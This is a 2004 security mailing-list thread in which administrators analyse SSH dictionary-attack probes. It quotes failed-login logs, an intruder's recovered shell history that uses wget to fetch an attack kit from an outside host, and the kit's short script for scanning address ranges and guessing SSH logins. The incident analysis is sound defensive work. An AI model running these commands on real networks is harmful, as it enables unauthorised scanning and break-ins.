1 |
That certainly is a good point. On the other hand I have this in the log |
2 |
of one of my machines: |
3 |
|
4 |
Jul 27 2004 14:38 GMT: |
5 |
|
6 |
Failed password for illegal user test from 220.80.108.73 port 60972 ssh2 |
7 |
Failed password for root from 220.80.108.73 port 60902 ssh2 |
8 |
Failed password for root from 220.80.108.73 port 60825 ssh2 |
9 |
Failed password for root from 220.80.108.73 port 60742 ssh2 |
10 |
Failed password for illegal user user from 220.80.108.73 port 60670 ssh2 |
11 |
Failed password for illegal user admin from 220.80.108.73 port 60584 ssh2 |
12 |
Failed password for illegal user admin from 220.80.108.73 port 60515 ssh2 |
13 |
Failed password for illegal user guest from 220.80.108.73 port 60419 ssh2 |
14 |
Failed password for illegal user test from 220.80.108.73 port 60339 ssh2 |
15 |
|
16 |
|
17 |
Jul 20 2004 16:20 GMT: |
18 |
|
19 |
Failed password for illegal user test from 131.234.157.10 port 37301 ssh2 |
20 |
Failed password for root from 131.234.157.10 port 37284 ssh2 |
21 |
Failed password for root from 131.234.157.10 port 37253 ssh2 |
22 |
Failed password for root from 131.234.157.10 port 37267 ssh2 |
23 |
Failed password for illegal user admin from 131.234.157.10 port 37210 ssh2 |
24 |
Failed password for illegal user admin from 131.234.157.10 port 37191 ssh2 |
25 |
Failed password for illegal user user from 131.234.157.10 port 37229 ssh2 |
26 |
Failed password for illegal user test from 131.234.157.10 port 37133 ssh2 |
27 |
Failed password for illegal user guest from 131.234.157.10 port 37164 ssh2 |
28 |
|
29 |
|
30 |
And something simillar on Jul 20 2004 01:10 GMT from 66.250.111.33. |
31 |
|
32 |
I'm wondering if it has anything to do with these ssh probes. I'm |
33 |
getting the 'guest and test' probes as well, but far more recently |
34 |
(starting Jul 28). |
35 |
|
36 |
Please note that there are root attempts as well in the logs. Also |
37 |
please note that there are everytime 2 admin, 3 root, 2 test, 1 user and |
38 |
1 guest attempts, so it looks like a simple dictionary attack with some |
39 |
basic empty/weak passwords. |
40 |
|
41 |
It's just a wild guess but could it be that there are 2 stages of this |
42 |
'thing'? |
43 |
|
44 |
Hope it helps... |
45 |
|
46 |
--jd |
47 |
|
48 |
Rui Pedro Figueira Covelo wrote: |
49 |
> I noticed that the .bash_history it's from the root account. Not guest |
50 |
> or test. If this .bash_history is real, the fact that someone got root |
51 |
> proves that someone used an exploit rather than guessing a weak password |
52 |
> of a guest or test account, right? |
53 |
> |
54 |
> |
55 |
> |
56 |
> |
57 |
> |
58 |
> Dan Margolis wrote: |
59 |
> | I grabbed the tgz before it's too late. I plan on running it with a |
60 |
> | sniffer so I can see what it's doing--that should indicate whether it's |
61 |
> | really using some unknown ssh exploit (I'm afraid I'm not a whiz at |
62 |
> | disassembly, so I'd rather not take that route). I tend to think it's |
63 |
> | not; there was an OpenSSH vuln a while back that this guy's Debian |
64 |
> | machine might still be vulnerable to, if it wasn't patched in a year. If |
65 |
> | there were an unknown vulnerability, he'd be having a lot more success |
66 |
> | and we'd be seeing this a whole lot more (unless we're all rooted and |
67 |
> | don't know it). |
68 |
> | |
69 |
> | Anyone have any more information on this? |
70 |
> | |
71 |
> | -------- Original Message -------- |
72 |
> | |
73 |
> | From: Stefan Janecek <stefan.janecek@×××.at> |
74 |
> | To: full-disclosure@××××××××××××.com |
75 |
> | |
76 |
> | |
77 |
> | Hmmm - I have also been getting those login attemps, but thought them to |
78 |
> | be harmless. Maybe they are not *that* harmless, though... Today I |
79 |
> | managed to get my hands on a machine that was originating such login |
80 |
> | attempts. I must admit I am far from being a linux security expert, but |
81 |
> | this is what I've found out up to now: |
82 |
> | |
83 |
> | Whoever broke into the machine did not take any attempts to cover up his |
84 |
> | tracks - this is what I found in /root/.bash_history: |
85 |
> | |
86 |
> | ------ |
87 |
> | id |
88 |
> | uname -a |
89 |
> | w |
90 |
> | id |
91 |
> | ls |
92 |
> | wgte frauder.us/linux/ssh.tgz |
93 |
> | wget frauder.us/linux/ssh.tgz |
94 |
> | tar xzvf ssh.tgz |
95 |
> | tar xvf ssh.tgz |
96 |
> | ls |
97 |
> | cd ssh |
98 |
> | ls |
99 |
> | ./go.sh 195.178 |
100 |
> | ls |
101 |
> | pico uniq.txt |
102 |
> | vi uniq.txt |
103 |
> | ls |
104 |
> | rm -rf uniq.txt |
105 |
> | ./go.sh 167.205 |
106 |
> | ls |
107 |
> | rm -rf uniq.txt vuln.txt |
108 |
> | ./go.sh 202.148.20 |
109 |
> | ./go.sh 212.92 |
110 |
> | ./go.sh 195.197 |
111 |
> | ./go.sh 147.32 |
112 |
> | ./go.sh 213.168 |
113 |
> | ./go.sh 134.176 |
114 |
> | ./go.sh 195.83 |
115 |
> | ------ |
116 |
> | |
117 |
> | um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two |
118 |
> | binaries: |
119 |
> | |
120 |
> | go.sh: |
121 |
> | ------- |
122 |
> | ./ss 22 -b $1 -i eth0 -s 6 |
123 |
> | cat bios.txt |sort | uniq > uniq.txt |
124 |
> | ./sshf |
125 |
> | ------- |
126 |
> | |
127 |
> | * 'ss' apparently is some sort of portscanner |
128 |
> | * 'sshf' connects to every IP in uniq.txt and tries to log in as user |
129 |
> | 'test' first, then as user 'guest' (according to tcpdump). |
130 |
> | |
131 |
> | This does not seem to be a stupid brute force attack, as there is only |
132 |
> | one login attempt per user. Could it be that the tool tries to exploit |
133 |
> | some vulnerability in the sshd, and just tries to look harmless by using |
134 |
> | 'test' and 'guest' as usernames? |
135 |
> | |
136 |
> | The compromised machine was running an old debian woody installation |
137 |
> | which had not been upgraded for at least one year, the sshd version |
138 |
> | string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10' |
139 |
> | |
140 |
> | As already mentioned, I am far from being an expert, but if I can assist |
141 |
> | in further testing, then let me know. Please CC me, I am not subscribed |
142 |
> | to the list. |
143 |
> | |
144 |
> | cheers, |
145 |
> | Stefan |
146 |
> | |
147 |
> | |
148 |
> | |
149 |
> | |
150 |
> | |
151 |
> | |
152 |
> | _______________________________________________ |
153 |
> | Full-Disclosure - We believe in it. |
154 |
> | Charter: http://lists.netsys.com/full-disclosure-charter.html |
155 |
> | |
156 |
> | |
157 |
> | -- |
158 |
> | Dan ("KrispyKringle") |
159 |
> | Gentoo Linux Security Coordinator |
160 |
> |
161 |
> -- |
162 |
> gentoo-security@g.o mailing list |
163 |
> |
164 |
> |
165 |
|
166 |
-- |
167 |
gentoo-security@g.o mailing list |
168 |
|
169 |
|
170 |
-- |
171 |
gentoo-security@g.o mailing list |